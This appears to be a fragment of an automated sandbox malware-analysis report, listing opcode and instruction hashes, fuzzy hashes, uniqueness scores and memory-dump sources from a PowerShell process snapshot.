                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 052c95e308e5a8da43433297983287bee8ac312241c13fdeaa582bfe935503d0
                                          • Instruction ID: 3b9d4503d0a5fda1d09840e754298864b09ae5b81a210aea013986e4098af112
                                          • Opcode Fuzzy Hash: 052c95e308e5a8da43433297983287bee8ac312241c13fdeaa582bfe935503d0
                                          • Instruction Fuzzy Hash: 9AC08C14108EC16BCB22C3288C83ACF1F602B02000F8D80DC88848F21BC214100DE329
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 069fe0a187bddd4b766e84c7184a8bd1482f8b37c9c2670959e252ae643a6415
                                          • Instruction ID: 227f37d41ae7dd0efa89a253a1a7365c29506faa9f1715799ff29299596065e8
                                          • Opcode Fuzzy Hash: 069fe0a187bddd4b766e84c7184a8bd1482f8b37c9c2670959e252ae643a6415
                                          • Instruction Fuzzy Hash: 31C08C3AF410098FCB00CB95F8888DCF771FBC8225B00C423E10983101C7319021DB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 75504ab751d81f0a66e99c9ac09ce23e35b9b791f5b6f03f89165dec8c79792c
                                          • Instruction ID: f7cebe9c122a89adc1e877260959da43b02c90b053b8ddc0fa6e8b051147c6ae
                                          • Opcode Fuzzy Hash: 75504ab751d81f0a66e99c9ac09ce23e35b9b791f5b6f03f89165dec8c79792c
                                          • Instruction Fuzzy Hash: BFC08C24088FC02BCB24CA248C8B2CE3FA0AB0A000FCCC0DD8840CF243D318000BA249
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b7a1fb61ac9c9f8d6ed1dd85faa150d57c4bdef47b44fab6a109448bdd1fabf
                                          • Instruction ID: c5c2cf8e44ea8821b3f9929fd4ec99db5cd1133720ed8f2807f89f6832e1fc58
                                          • Opcode Fuzzy Hash: 7b7a1fb61ac9c9f8d6ed1dd85faa150d57c4bdef47b44fab6a109448bdd1fabf
                                          • Instruction Fuzzy Hash: E6C08C3208E280DFCB219AA08D09F4A3E206BE0702F07804DEB480A086D4214014FB22
                                          Uniqueness

                                          Uniqueness Score: -1.00%